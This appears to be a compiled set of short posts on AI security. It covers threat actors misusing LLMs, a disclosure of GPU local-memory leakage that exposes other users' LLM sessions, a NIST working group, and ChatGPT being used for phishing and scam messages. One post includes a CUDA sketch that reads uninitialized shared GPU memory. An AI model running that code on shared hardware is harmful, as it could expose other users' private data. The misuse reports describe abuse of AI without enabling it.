[2024/02/14]
Staying ahead of threat actors in the age of AI | Microsoft Security Blog
"[...] identified activity associated with known threat actors, including prompt-injections, attempted misuse of large language models (LLM), and fraud. Our analysis of the current use of LLM technology by threat actors revealed behaviors consistent with attackers using AI as another productivity tool on the offensive landscape."
Pretty interesting disclosure. By recovering leftover data from local memory (an optimized on-chip GPU memory region), researchers were able to build a PoC in which an attacker can listen in on another user's interactive LLM session (e.g., llama.cpp) across process or container boundaries.
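For those curious about the mechanics, the core idea is that on some GPUs this local/shared memory is not zeroed between kernel launches, so a kernel that reads it before writing anything can observe data left behind by a previous workload. Below is a minimal CUDA sketch of that primitive only, not the researchers' actual PoC; it assumes a CUDA-capable device and the nvcc toolchain, and simply dumps uninitialized shared memory back to the host.

```cuda
// Minimal sketch (assumptions: CUDA-capable GPU, nvcc toolchain).
// Illustrates reading uninitialized on-chip shared ("local") memory.
// On platforms that scrub this memory between launches, the output
// will simply be zeros; this is a demonstration, not an exploit.
#include <cstdio>
#include <cuda_runtime.h>

__global__ void dump_local_memory(unsigned int *out, int n) {
    // Declare shared memory but deliberately never write to it.
    __shared__ unsigned int leftovers[1024];
    int i = threadIdx.x;
    if (i < n && i < 1024) {
        out[i] = leftovers[i];  // copy out whatever the hardware left behind
    }
}

int main() {
    const int n = 1024;
    unsigned int *d_out = nullptr, h_out[n];
    cudaMalloc(&d_out, n * sizeof(unsigned int));

    dump_local_memory<<<1, n>>>(d_out, n);
    cudaMemcpy(h_out, d_out, n * sizeof(unsigned int), cudaMemcpyDeviceToHost);

    // Non-zero words hint that prior contents survived in local memory.
    for (int i = 0; i < 8; ++i) printf("%08x ", h_out[i]);
    printf("\n");

    cudaFree(d_out);
    return 0;
}
```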
Has anyone's company implemented a security policy or code of conduct for LLMs (such as ChatGPT) that they would be willing to share publicly?
Good news: NIST launches generative #AI working group. The public working group will develop guidance around the special risks of AI technologies that generate content. Stay tuned☝️🛡️ #AISecurity
The power, promise, and peril of cybersecurity in the AI age. #SecureAI
Hashtags: #chatGPT #AIsecurity #Cyberthreats Summary: The release of OpenAI's ChatGPT language model has raised concerns about its potential misuse in cyberattacks. Researchers have demonstrated how the chatbot can be used to write convincing email messages that encourage recipients to share corporate secrets, create tweets promoting investment scams, and attack individuals through social media.…